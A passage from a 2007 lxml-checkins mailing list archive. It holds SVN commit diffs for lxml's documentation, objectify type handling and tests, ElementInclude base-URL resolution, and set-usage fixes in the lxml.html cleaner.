inherits most of its capabilities -and a large portion of its API. - -* lxml.etree is a generic API for XML and HTML handling. It aims for - ElementTree compatibility_ and supports the entire XML infoset. It is well - suited for both mixed content and data centric XML. Its generality makes it - the best choice for most applications. - -* lxml.objectify is a specialized API for XML data handling in a Python object - syntax. It provides a very natural way to deal with data fields stored in a - structurally well defined XML format. Data is automatically converted to - Python data types and can be manipulated with normal Python operators. Look - at the examples in the `objectify documentation`_ to see what it feels like - to use it. - - Objectify is not well suited for mixed contents or HTML documents. As it is - built on top of lxml.etree, however, it inherits the normal support for - XPath, XSLT or validation. - - -How can I make my application run faster? ------------------------------------------ - -lxml.etree is a very fast library for processing XML. There are, however, `a -few caveats`_ involved in the mapping of the powerful libxml2 library to the -simple and convenient ElementTree API. Not all operations are as fast as the -simplicity of the API might suggest, while some use cases can heavily benefit -from finding the right way of doing them. The `benchmark page`_ has a -comparison to other ElementTree implementations and a number of tips for -performance tweaking. As with any Python application, the rule of thumb is: -the more of your processing runs in C, the faster your application gets. See -also the section on threading_. - -.. _`a few caveats`: performance.html#the-elementtree-api -.. _`benchmark page`: performance.html -.. _threading: #threading - - Why do I get errors about missing UCS4 symbols when installing lxml? -------------------------------------------------------------------- From scoder at codespeak.net Tue Jun 19 14:21:26 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 14:21:26 +0200 (CEST) Subject: [Lxml-checkins] r44367 - lxml/trunk/doc Message-ID: <20070619122126.954AC80E5@code0.codespeak.net> Author: scoder Date: Tue Jun 19 14:21:23 2007 New Revision: 44367 Modified: lxml/trunk/doc/intro.txt Log: intro cleanup Modified: lxml/trunk/doc/intro.txt ============================================================================== --- lxml/trunk/doc/intro.txt (original) +++ lxml/trunk/doc/intro.txt Tue Jun 19 14:21:23 2007 @@ -14,21 +14,20 @@ To explain the motto: -"Programming with libxml2 is like the thrilling embrace of an exotic -stranger. It seems to have the potential to fulfill your wildest -dreams, but there's a nagging voice somewhere in your head warning you -that you're about to get screwed in the worst way." (`a quote by Mark -Pilgrim`_) - -Mark Pilgrim was describing in particular the experience a Python -programmer has when dealing with libxml2. libxml2's default Python -bindings are fast, thrilling, powerful, and your code might fail in -some horrible way that you really shouldn't have to worry about when -writing Python code. lxml tries to combine the power of libxml2 with -the ease of use of Python. +"Programming with libxml2 is like the thrilling embrace of an exotic stranger. +It seems to have the potential to fulfill your wildest dreams, but there's a +nagging voice somewhere in your head warning you that you're about to get +screwed in the worst way." (`a quote by Mark Pilgrim`_) + +Mark Pilgrim was describing in particular the experience a Python programmer +has when dealing with libxml2. The default Python bindings of libxml2 are +fast, thrilling, powerful, and your code might fail in some horrible way that +you really shouldn't have to worry about when writing Python code. lxml +combines the power of libxml2 with the ease of use of Python. .. _`a quote by Mark Pilgrim`: http://diveintomark.org/archives/2004/02/18/libxml2 + Aims ---- @@ -36,6 +35,8 @@ * Standards-compliant XML support. +* Support for (broken) HTML. + * Full-featured. * Actively maintained by XML experts. @@ -46,8 +47,9 @@ .. _libxslt: http://xmlsoft.org/XSLT -These libraries already ship with Python bindings, but these Python -bindings have problems. In particular: + +These libraries already ship with Python bindings, but these Python bindings +mimic the C-level interface. This yields a number of problems: * very low level and C-ish (not Pythonic). @@ -55,12 +57,13 @@ * UTF-8 in API, instead of Python unicode strings. -* can cause segfaults from Python. +* Can easily cause segfaults from Python. + +* Require manual memory management! -* have to do manual memory management! -lxml is a new Python binding for libxml2 and libxslt, completely -independent from these existing Python bindings. Its aim: +lxml is a new Python binding for libxml2 and libxslt, completely independent +from these existing Python bindings. Its aims: * Pythonic API. @@ -72,9 +75,8 @@ * No manual memory management! -lxml aims to provide a Pythonic API by following as much as possible -the `ElementTree API`_. We're trying to avoid having to invent too -many new APIs, or you having to learn new things -- XML is complicated -enough. +lxml aims to provide a Pythonic API by following as much as possible the +`ElementTree API`_. We're trying to avoid inventing too many new APIs, or you +having to learn new things -- XML is complicated enough. .. _`ElementTree API`: http://effbot.org/zone/element-index.htm From scoder at codespeak.net Tue Jun 19 14:23:15 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 14:23:15 +0200 (CEST) Subject: [Lxml-checkins] r44368 - lxml/trunk/doc Message-ID: <20070619122315.EB4BA80E5@code0.codespeak.net> Author: scoder Date: Tue Jun 19 14:23:10 2007 New Revision: 44368 Modified: lxml/trunk/doc/FAQ.txt Log: small FAQ cleanup Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Tue Jun 19 14:23:10 2007 @@ -6,8 +6,8 @@ :description: Frequently Asked Questions about lxml (FAQ) :keywords: lxml, lxml.etree, FAQ, frequently asked questions - -See also the notes on compatibility_ to ElementTree_. +Frequently asked questions on lxml. See also the notes on compatibility_ to +ElementTree_. .. _compatibility: compatibility.html .. _ElementTree: http://effbot.org/zone/element-index.htm From scoder at codespeak.net Tue Jun 19 14:23:58 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 14:23:58 +0200 (CEST) Subject: [Lxml-checkins] r44369 - lxml/trunk/doc Message-ID: <20070619122358.E726980E5@code0.codespeak.net> Author: scoder Date: Tue Jun 19 14:23:58 2007 New Revision: 44369 Modified: lxml/trunk/doc/parsing.txt Log: doc: missing parser opts, make clear lxml parses both XML and HTML Modified: lxml/trunk/doc/parsing.txt ============================================================================== --- lxml/trunk/doc/parsing.txt (original) +++ lxml/trunk/doc/parsing.txt Tue Jun 19 14:23:58 2007 @@ -1,9 +1,10 @@ -===================== -Parsing XML with lxml -===================== - -lxml provides a very simple and powerful API for parsing XML. It supports -one-step parsing as well as step-by-step parsing using an event-driven API. +============================== +Parsing XML and HTML with lxml +============================== + +lxml provides a very simple and powerful API for parsing XML and HTML. It +supports one-step parsing as well as step-by-step parsing using an +event-driven API (currently only for XML). .. contents:: .. @@ -64,6 +65,10 @@ * remove_blank_text - discard blank text nodes between tags +* remove_comments - discard comments + +* compact - use compact storage for short text content (on by default) + Parsing HTML ------------ From scoder at codespeak.net Tue Jun 19 14:24:36 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 14:24:36 +0200 (CEST) Subject: [Lxml-checkins] r44370 - lxml/branch/lxml-1.3/doc Message-ID: <20070619122436.8FEBE80E5@code0.codespeak.net> Author: scoder Date: Tue Jun 19 14:24:31 2007 New Revision: 44370 Modified: lxml/branch/lxml-1.3/doc/FAQ.txt lxml/branch/lxml-1.3/doc/intro.txt lxml/branch/lxml-1.3/doc/parsing.txt Log: doc merge from trunk Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Tue Jun 19 14:24:31 2007 @@ -7,8 +7,8 @@ :keywords: lxml, lxml.etree, FAQ, frequently asked questions :authors: Stefan Behnel, and various people on the mailing list - -See also the notes on compatibility_ to ElementTree_. +Frequently asked questions on lxml. See also the notes on compatibility_ to +ElementTree_. .. _compatibility: compatibility.html .. _ElementTree: http://effbot.org/zone/element-index.htm Modified: lxml/branch/lxml-1.3/doc/intro.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/intro.txt (original) +++ lxml/branch/lxml-1.3/doc/intro.txt Tue Jun 19 14:24:31 2007 @@ -14,21 +14,20 @@ To explain the motto: -"Programming with libxml2 is like the thrilling embrace of an exotic -stranger. It seems to have the potential to fulfill your wildest -dreams, but there's a nagging voice somewhere in your head warning you -that you're about to get screwed in the worst way." (`a quote by Mark -Pilgrim`_) - -Mark Pilgrim was describing in particular the experience a Python -programmer has when dealing with libxml2. libxml2's default Python -bindings are fast, thrilling, powerful, and your code might fail in -some horrible way that you really shouldn't have to worry about when -writing Python code. lxml tries to combine the power of libxml2 with -the ease of use of Python. +"Programming with libxml2 is like the thrilling embrace of an exotic stranger. +It seems to have the potential to fulfill your wildest dreams, but there's a +nagging voice somewhere in your head warning you that you're about to get +screwed in the worst way." (`a quote by Mark Pilgrim`_) + +Mark Pilgrim was describing in particular the experience a Python programmer +has when dealing with libxml2. The default Python bindings of libxml2 are +fast, thrilling, powerful, and your code might fail in some horrible way that +you really shouldn't have to worry about when writing Python code. lxml +combines the power of libxml2 with the ease of use of Python. .. _`a quote by Mark Pilgrim`: http://diveintomark.org/archives/2004/02/18/libxml2 + Aims ---- @@ -36,6 +35,8 @@ * Standards-compliant XML support. +* Support for (broken) HTML. + * Full-featured. * Actively maintained by XML experts. @@ -46,8 +47,9 @@ .. _libxslt: http://xmlsoft.org/XSLT -These libraries already ship with Python bindings, but these Python -bindings have problems. In particular: + +These libraries already ship with Python bindings, but these Python bindings +mimic the C-level interface. This yields a number of problems: * very low level and C-ish (not Pythonic). @@ -55,12 +57,13 @@ * UTF-8 in API, instead of Python unicode strings. -* can cause segfaults from Python. +* Can easily cause segfaults from Python. + +* Require manual memory management! -* have to do manual memory management! -lxml is a new Python binding for libxml2 and libxslt, completely -independent from these existing Python bindings. Its aim: +lxml is a new Python binding for libxml2 and libxslt, completely independent +from these existing Python bindings. Its aims: * Pythonic API. @@ -72,9 +75,8 @@ * No manual memory management! -lxml aims to provide a Pythonic API by following as much as possible -the `ElementTree API`_. We're trying to avoid having to invent too -many new APIs, or you having to learn new things -- XML is complicated -enough. +lxml aims to provide a Pythonic API by following as much as possible the +`ElementTree API`_. We're trying to avoid inventing too many new APIs, or you +having to learn new things -- XML is complicated enough. .. _`ElementTree API`: http://effbot.org/zone/element-index.htm Modified: lxml/branch/lxml-1.3/doc/parsing.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/parsing.txt (original) +++ lxml/branch/lxml-1.3/doc/parsing.txt Tue Jun 19 14:24:31 2007 @@ -1,9 +1,10 @@ -===================== -Parsing XML with lxml -===================== - -lxml provides a very simple and powerful API for parsing XML. It supports -one-step parsing as well as step-by-step parsing using an event-driven API. +============================== +Parsing XML and HTML with lxml +============================== + +lxml provides a very simple and powerful API for parsing XML and HTML. It +supports one-step parsing as well as step-by-step parsing using an +event-driven API (currently only for XML). .. contents:: .. @@ -64,6 +65,10 @@ * remove_blank_text - discard blank text nodes between tags +* remove_comments - discard comments + +* compact - use compact storage for short text content (on by default) + Parsing HTML ------------ From scoder at codespeak.net Tue Jun 19 17:22:31 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 17:22:31 +0200 (CEST) Subject: [Lxml-checkins] r44377 - lxml/trunk/src/lxml Message-ID: <20070619152231.7765180E5@code0.codespeak.net> Author: scoder Date: Tue Jun 19 17:22:30 2007 New Revision: 44377 Modified: lxml/trunk/src/lxml/objectify.pyx Log: objectify: support '0' and '1' as boolean values Modified: lxml/trunk/src/lxml/objectify.pyx ============================================================================== --- lxml/trunk/src/lxml/objectify.pyx (original) +++ lxml/trunk/src/lxml/objectify.pyx Tue Jun 19 17:22:30 2007 @@ -759,7 +759,7 @@ return self.__nonzero__() def __checkBool(s): - if s != 'true' and s != 'false': + if s != 'true' and s != 'false' and s != '1' and s != '0': raise ValueError cdef object _strValueOf(obj): From scoder at codespeak.net Tue Jun 19 18:00:06 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 18:00:06 +0200 (CEST) Subject: [Lxml-checkins] r44381 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070619160006.F2BEC80EA@code0.codespeak.net> Author: scoder Date: Tue Jun 19 18:00:06 2007 New Revision: 44381 Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx Log: objectify: support '0' and '1' as boolean values Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Tue Jun 19 18:00:06 2007 @@ -759,7 +759,7 @@ return self.__nonzero__() def __checkBool(s): - if s != 'true' and s != 'false': + if s != 'true' and s != 'false' and s != '1' and s != '0': raise ValueError cdef object _strValueOf(obj): From scoder at codespeak.net Tue Jun 19 21:39:55 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 21:39:55 +0200 (CEST) Subject: [Lxml-checkins] r44387 - lxml/branch/lxml-1.3/src/lxml/tests Message-ID: <20070619193955.8949680ED@code0.codespeak.net> Author: scoder Date: Tue Jun 19 21:39:54 2007 New Revision: 44387 Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Log: objectify xsi type testcases by Holger Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Tue Jun 19 21:39:54 2007 @@ -22,6 +22,24 @@ "xsi" : XML_SCHEMA_INSTANCE_NS, "xsd" : XML_SCHEMA_NS} +objectclass2xsitype = { + # objectify built-in + objectify.IntElement: ("int", "short", "byte", "unsignedShort", + "unsignedByte",), + objectify.LongElement: ("integer", "nonPositiveInteger", "negativeInteger", + "long", "nonNegativeInteger", "unsignedLong", + "unsignedInt", "positiveInteger",), + objectify.FloatElement: ("float", "double"), + objectify.BoolElement: ("boolean",), + objectify.StringElement: ("string", "normalizedString", "token", "language", + "Name", "NCName", "ID", "IDREF", "ENTITY", + "NMTOKEN", ), + # None: xsi:nil="true" + } + +xsitype2objclass = dict(( (v, k) for k in objectclass2xsitype + for v in objectclass2xsitype[k] )) + xml_str = '''\ @@ -476,6 +494,24 @@ self.assert_(isinstance(value, objectify.FloatElement)) self.assertEquals(value, 5.5) + def test_data_element_xsitypes(self): + for xsi, objclass in xsitype2objclass.iteritems(): + # 1 is a valid value for all ObjectifiedDataElement classes + value = objectify.DataElement(1, _xsi=xsi) + self.assert_(isinstance(value, objclass)) + + def test_data_element_xsitypes_xsdprefixed(self): + for xsi, objclass in xsitype2objclass.iteritems(): + # 1 is a valid value for all ObjectifiedDataElement classes + value = objectify.DataElement(1, _xsi="xsd:%s" % xsi) + self.assert_(isinstance(value, objclass)) + + def test_data_element_xsitypes_prefixed(self): + for xsi, objclass in xsitype2objclass.iteritems(): + # 1 is a valid value for all ObjectifiedDataElement classes + self.assertRaises(ValueError, objectify.DataElement, 1, + _xsi="foo:%s" % xsi) + def test_schema_types(self): XML = self.XML root = XML('''\ From scoder at codespeak.net Wed Jun 20 23:50:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 20 Jun 2007 23:50:24 +0200 (CEST) Subject: [Lxml-checkins] r44400 - lxml/trunk Message-ID: <20070620215024.9CF69811D@code0.codespeak.net> Author: scoder Date: Wed Jun 20 23:50:23 2007 New Revision: 44400 Modified: lxml/trunk/versioninfo.py Log: support unnormal SVN entries files Modified: lxml/trunk/versioninfo.py ============================================================================== --- lxml/trunk/versioninfo.py (original) +++ lxml/trunk/versioninfo.py Wed Jun 20 23:50:23 2007 @@ -34,7 +34,10 @@ data = map(str.splitlines, data.split('\n\x0c\n')) del data[0][0] # get rid of the '8' dirurl = data[0][3] - localrev = max([int(d[9]) for d in data if len(d)>9 and d[9]]) + try: + localrev = max([int(d[9]) for d in data if len(d)>9 and d[9]]) + except ValueError: + pass # may be some newly added directory elif data.startswith(' Author: scoder Date: Thu Jun 21 00:14:15 2007 New Revision: 44402 Added: lxml/trunk/src/lxml/tests/include/ lxml/trunk/src/lxml/tests/include/test_xinclude.xml - copied, changed from r44377, lxml/trunk/src/lxml/tests/test_xinclude.xml Removed: lxml/trunk/src/lxml/tests/test_xinclude.xml Modified: lxml/trunk/CHANGES.txt lxml/trunk/src/lxml/ElementInclude.py lxml/trunk/src/lxml/tests/test_etree.py Log: ElementInclude didn't honour base URL of source document Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Thu Jun 21 00:14:15 2007 @@ -52,6 +52,8 @@ Bugs fixed ---------- +* ``ElementInclude`` didn't honour base URL of original document + * Replacing the children slice of an Element would cut off the tails of the original children Modified: lxml/trunk/src/lxml/ElementInclude.py ============================================================================== --- lxml/trunk/src/lxml/ElementInclude.py (original) +++ lxml/trunk/src/lxml/ElementInclude.py Thu Jun 21 00:14:15 2007 @@ -46,6 +46,7 @@ ## import copy, etree +from urlparse import urljoin try: set @@ -123,13 +124,15 @@ def include(elem, loader=None): if hasattr(elem, 'getroot'): - #if hasattr(elem, 'docinfo'): - # base_url = elem.docinfo.URL - _include(elem.getroot(), loader) + tree = elem + elem = elem.getroot() else: - _include(elem, loader) + tree = elem.getroottree() + if hasattr(tree, 'docinfo'): + base_url = tree.docinfo.URL + _include(elem, loader, base_url=base_url) -def _include(elem, loader=None, _parent_hrefs=None): +def _include(elem, loader=None, _parent_hrefs=None, base_url=None): if loader is not None: load_include = _wrap_et_loader(loader) else: @@ -146,7 +149,7 @@ for e in include_elements: if e.tag == XINCLUDE_INCLUDE: # process xinclude directive - href = e.get("href") + href = urljoin(base_url, e.get("href")) parse = e.get("parse", "xml") parent = e.getparent() if parse == "xml": Copied: lxml/trunk/src/lxml/tests/include/test_xinclude.xml (from r44377, lxml/trunk/src/lxml/tests/test_xinclude.xml) ============================================================================== --- lxml/trunk/src/lxml/tests/test_xinclude.xml (original) +++ lxml/trunk/src/lxml/tests/include/test_xinclude.xml Thu Jun 21 00:14:15 2007 @@ -1,4 +1,4 @@ - + \ No newline at end of file Modified: lxml/trunk/src/lxml/tests/test_etree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_etree.py (original) +++ lxml/trunk/src/lxml/tests/test_etree.py Thu Jun 21 00:14:15 2007 @@ -1634,12 +1634,8 @@ self.assertEquals(old_text + content + old_tail, root.text) -class ETreeXIncludeTestCase(XIncludeTestCase): - def include(self, tree): - tree.xinclude() - def test_xinclude(self): - tree = etree.parse(fileInTestDir('test_xinclude.xml')) + tree = etree.parse(fileInTestDir('include/test_xinclude.xml')) # process xincludes self.include( tree ) # check whether we find it replaced with included data @@ -1647,6 +1643,10 @@ 'a', tree.getroot()[1].tag) +class ETreeXIncludeTestCase(XIncludeTestCase): + def include(self, tree): + tree.xinclude() + class ElementIncludeTestCase(XIncludeTestCase): from lxml import ElementInclude Deleted: /lxml/trunk/src/lxml/tests/test_xinclude.xml ============================================================================== --- /lxml/trunk/src/lxml/tests/test_xinclude.xml Thu Jun 21 00:14:15 2007 +++ (empty file) @@ -1,4 +0,0 @@ - - - - \ No newline at end of file From scoder at codespeak.net Thu Jun 21 00:15:12 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 21 Jun 2007 00:15:12 +0200 (CEST) Subject: [Lxml-checkins] r44403 - in lxml/branch/lxml-1.3: . src/lxml src/lxml/tests src/lxml/tests/include Message-ID: <20070620221512.EBEF3811E@code0.codespeak.net> Author: scoder Date: Thu Jun 21 00:15:12 2007 New Revision: 44403 Added: lxml/branch/lxml-1.3/src/lxml/tests/include/ - copied from r44402, lxml/trunk/src/lxml/tests/include/ lxml/branch/lxml-1.3/src/lxml/tests/include/test_xinclude.xml - copied unchanged from r44402, lxml/trunk/src/lxml/tests/include/test_xinclude.xml Removed: lxml/branch/lxml-1.3/src/lxml/tests/test_xinclude.xml Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/ElementInclude.py lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Log: ElementInclude didn't honour base URL of source document Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Thu Jun 21 00:15:12 2007 @@ -27,6 +27,8 @@ Bugs fixed ---------- +* ``ElementInclude`` didn't honour base URL of original document + * Replacing the children slice of an Element would cut off the tails of the original children Modified: lxml/branch/lxml-1.3/src/lxml/ElementInclude.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/ElementInclude.py (original) +++ lxml/branch/lxml-1.3/src/lxml/ElementInclude.py Thu Jun 21 00:15:12 2007 @@ -46,6 +46,7 @@ ## import copy, etree +from urlparse import urljoin try: set @@ -123,13 +124,15 @@ def include(elem, loader=None): if hasattr(elem, 'getroot'): - #if hasattr(elem, 'docinfo'): - # base_url = elem.docinfo.URL - _include(elem.getroot(), loader) + tree = elem + elem = elem.getroot() else: - _include(elem, loader) + tree = elem.getroottree() + if hasattr(tree, 'docinfo'): + base_url = tree.docinfo.URL + _include(elem, loader, base_url=base_url) -def _include(elem, loader=None, _parent_hrefs=None): +def _include(elem, loader=None, _parent_hrefs=None, base_url=None): if loader is not None: load_include = _wrap_et_loader(loader) else: @@ -146,7 +149,7 @@ for e in include_elements: if e.tag == XINCLUDE_INCLUDE: # process xinclude directive - href = e.get("href") + href = urljoin(base_url, e.get("href")) parse = e.get("parse", "xml") parent = e.getparent() if parse == "xml": Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Thu Jun 21 00:15:12 2007 @@ -1598,12 +1598,8 @@ self.assertEquals(old_text + content + old_tail, root.text) -class ETreeXIncludeTestCase(XIncludeTestCase): - def include(self, tree): - tree.xinclude() - def test_xinclude(self): - tree = etree.parse(fileInTestDir('test_xinclude.xml')) + tree = etree.parse(fileInTestDir('include/test_xinclude.xml')) # process xincludes self.include( tree ) # check whether we find it replaced with included data @@ -1611,6 +1607,10 @@ 'a', tree.getroot()[1].tag) +class ETreeXIncludeTestCase(XIncludeTestCase): + def include(self, tree): + tree.xinclude() + class ElementIncludeTestCase(XIncludeTestCase): from lxml import ElementInclude Deleted: /lxml/branch/lxml-1.3/src/lxml/tests/test_xinclude.xml ============================================================================== --- /lxml/branch/lxml-1.3/src/lxml/tests/test_xinclude.xml Thu Jun 21 00:15:12 2007 +++ (empty file) @@ -1,4 +0,0 @@ - - - - \ No newline at end of file From scoder at codespeak.net Thu Jun 21 10:35:13 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 21 Jun 2007 10:35:13 +0200 (CEST) Subject: [Lxml-checkins] r44405 - lxml/trunk/src/lxml Message-ID: <20070621083513.8B6FD811D@code0.codespeak.net> Author: scoder Date: Thu Jun 21 10:35:13 2007 New Revision: 44405 Modified: lxml/trunk/src/lxml/ElementInclude.py Log: open any URL by default in ElementInclude, small optimisation Modified: lxml/trunk/src/lxml/ElementInclude.py ============================================================================== --- lxml/trunk/src/lxml/ElementInclude.py (original) +++ lxml/trunk/src/lxml/ElementInclude.py Thu Jun 21 10:35:13 2007 @@ -47,6 +47,7 @@ import copy, etree from urlparse import urljoin +from urllib2 import urlopen try: set @@ -96,7 +97,12 @@ if parse == "xml": data = etree.parse(href, parser).getroot() else: - data = open(href).read() + if "://" in href: + f = urlopen(href) + else: + f = open(href) + data = f.read() + f.close() if encoding: data = data.decode(encoding) return data @@ -122,14 +128,17 @@ # @throws IOError If the function fails to load a given resource. # @returns the node or its replacement if it was an XInclude node -def include(elem, loader=None): - if hasattr(elem, 'getroot'): - tree = elem +def include(elem, loader=None, base_url=None): + if base_url is None: + if hasattr(elem, 'getroot'): + tree = elem + elem = elem.getroot() + else: + tree = elem.getroottree() + if hasattr(tree, 'docinfo'): + base_url = tree.docinfo.URL + elif hasattr(elem, 'getroot'): elem = elem.getroot() - else: - tree = elem.getroottree() - if hasattr(tree, 'docinfo'): - base_url = tree.docinfo.URL _include(elem, loader, base_url=base_url) def _include(elem, loader=None, _parent_hrefs=None, base_url=None): From scoder at codespeak.net Thu Jun 21 12:29:21 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 21 Jun 2007 12:29:21 +0200 (CEST) Subject: [Lxml-checkins] r44407 - lxml/trunk/src/lxml/tests Message-ID: <20070621102921.7036A810E@code0.codespeak.net> Author: scoder Date: Thu Jun 21 12:29:20 2007 New Revision: 44407 Modified: lxml/trunk/src/lxml/tests/test_etree.py Log: small test fix Modified: lxml/trunk/src/lxml/tests/test_etree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_etree.py (original) +++ lxml/trunk/src/lxml/tests/test_etree.py Thu Jun 21 12:29:20 2007 @@ -1636,6 +1636,9 @@ def test_xinclude(self): tree = etree.parse(fileInTestDir('include/test_xinclude.xml')) + self.assertNotEquals( + 'a', + tree.getroot()[1].tag) # process xincludes self.include( tree ) # check whether we find it replaced with included data From scoder at codespeak.net Thu Jun 21 21:21:01 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 21 Jun 2007 21:21:01 +0200 (CEST) Subject: [Lxml-checkins] r44410 - lxml/branch/html/src/lxml/html Message-ID: <20070621192101.A610380D2@code0.codespeak.net> Author: scoder Date: Thu Jun 21 21:20:54 2007 New Revision: 44410 Modified: lxml/branch/html/src/lxml/html/clean.py Log: fix for stupid bug in set usage Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Thu Jun 21 21:20:54 2007 @@ -244,21 +244,21 @@ if meta: kill_tags.add('meta') if page_structure: - remove_tags.union(('head', 'html', 'title')) + remove_tags.update(('head', 'html', 'title')) if embedded: # FIXME: is really embedded? - kill_tags.union(('applet', 'param')) + kill_tags.update(('applet', 'param')) # The alternate contents that are in an iframe are a good fallback: # FIXME: somehow embed seems to be getting data, but from what I # can tell the embed tag is supposed to always be empty - remove_tags.union(('iframe', 'object', 'embed', 'layer')) + remove_tags.update(('iframe', 'object', 'embed', 'layer')) if frames: - kill_tags.union(defs.frame_tags) + kill_tags.update(defs.frame_tags) if forms: remove_tags.add('form') - kill_tags.union(('button', 'input', 'select', 'textarea')) + kill_tags.update(('button', 'input', 'select', 'textarea')) if annoying_tags: - remove_tags.union(('blink', 'marque')) + remove_tags.update(('blink', 'marque')) _remove = [] if strip_tags: From scoder at codespeak.net Thu Jun 21 21:22:23 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 21 Jun 2007 21:22:23 +0200 (CEST) Subject: [Lxml-checkins] r44411 - lxml/branch/html/src/lxml/html/tests Message-ID: <20070621192223.0C19D80C9@code0.codespeak.net> Author: scoder Date: Thu Jun 21 21:22:23 2007 New Revision: 44411 Modified: lxml/branch/html/src/lxml/html/tests/test_clean.txt Log: readability Modified: lxml/branch/html/src/lxml/html/tests/test_clean.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_clean.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_clean.txt Thu Jun 21 21:22:23 2007 @@ -1,6 +1,7 @@ >>> from lxml.html import parse, tostring >>> from lxml.html.clean import clean, clean_html >>> from lxml.html import usedoctest + >>> doc = ''' ... ... @@ -26,6 +27,7 @@ ... ... ... ''' + >>> print doc @@ -52,6 +54,7 @@ + >>> print tostring(parse(doc)) @@ -78,6 +81,7 @@ + >>> print clean_html(doc, page_structure=False, safe_attrs_only=False) @@ -95,6 +99,7 @@ + >>> print clean_html(doc, style=True, links=True, add_nofollow=True, ... page_structure=False, safe_attrs_only=False) From scoder at codespeak.net Fri Jun 22 09:40:08 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 09:40:08 +0200 (CEST) Subject: [Lxml-checkins] r44413 - in lxml/trunk/src/lxml: . tests Message-ID: <20070622074008.7D16B80B9@code0.codespeak.net> Author: scoder Date: Fri Jun 22 09:40:07 2007 New Revision: 44413 Modified: lxml/trunk/src/lxml/objectify.pyx lxml/trunk/src/lxml/tests/test_objectify.py Log: single function for annotate() and xsiannotate() Modified: lxml/trunk/src/lxml/objectify.pyx ============================================================================== --- lxml/trunk/src/lxml/objectify.pyx (original) +++ lxml/trunk/src/lxml/objectify.pyx Fri Jun 22 09:40:07 2007 @@ -1455,8 +1455,6 @@ # Type annotations cdef PyType _check_type(tree.xmlNode* c_node, PyType pytype): - # StrType does not have a typecheck but is the default anyway, - # so just accept it if given as type information if pytype is None: return None value = textOf(c_node) @@ -1468,34 +1466,114 @@ pass return None -def annotate(element_or_tree, ignore_old=True): +def annotate(element_or_tree, ignore_old=True, ignore_xsi=False, + empty_pytype=None): """Recursively annotates the elements of an XML tree with 'pytype' attributes. If the 'ignore_old' keyword argument is True (the default), current 'pytype' attributes will be ignored and replaced. Otherwise, they will be checked and only replaced if they no longer fit the current text value. + + Setting the keyword argument ``ignore_xsi`` to True makes the function + additionally ignore existing ``xsi:type`` annotations. The default is to + use them as a type hint. + + The default annotation of empty elements can be set with the + ``empty_pytype`` keyword argument. The default is not to annotate empty + elements. Pass 'str', for example, to make string values the default. + """ + cdef _Element element + element = cetree.rootNodeOrRaise(element_or_tree) + _annotate(element, 0, 1, bool(ignore_xsi), bool(ignore_old), + None, empty_pytype) + +def xsiannotate(element_or_tree, ignore_old=True, ignore_pytype=False, + empty_type=None): + """Recursively annotates the elements of an XML tree with 'xsi:type' + attributes. + + If the 'ignore_old' keyword argument is True (the default), current + 'xsi:type' attributes will be ignored and replaced. Otherwise, they will be + checked and only replaced if they no longer fit the current text value. + + Note that the mapping from Python types to XSI types is usually ambiguous. + Currently, only the first XSI type name in the corresponding PyType + definition will be used for annotation. Thus, you should consider naming + the widest type first if you define additional types. + + Setting the keyword argument ``ignore_pytype`` to True makes the function + additionally ignore existing ``pytype`` annotations. The default is to + use them as a type hint. + + The default annotation of empty elements can be set with the + ``empty_type`` keyword argument. The default is not to annotate empty + elements. Pass 'string', for example, to make string values the default. """ cdef _Element element + element = cetree.rootNodeOrRaise(element_or_tree) + _annotate(element, 1, 0, bool(ignore_old), bool(ignore_pytype), + empty_type, None) + +cdef 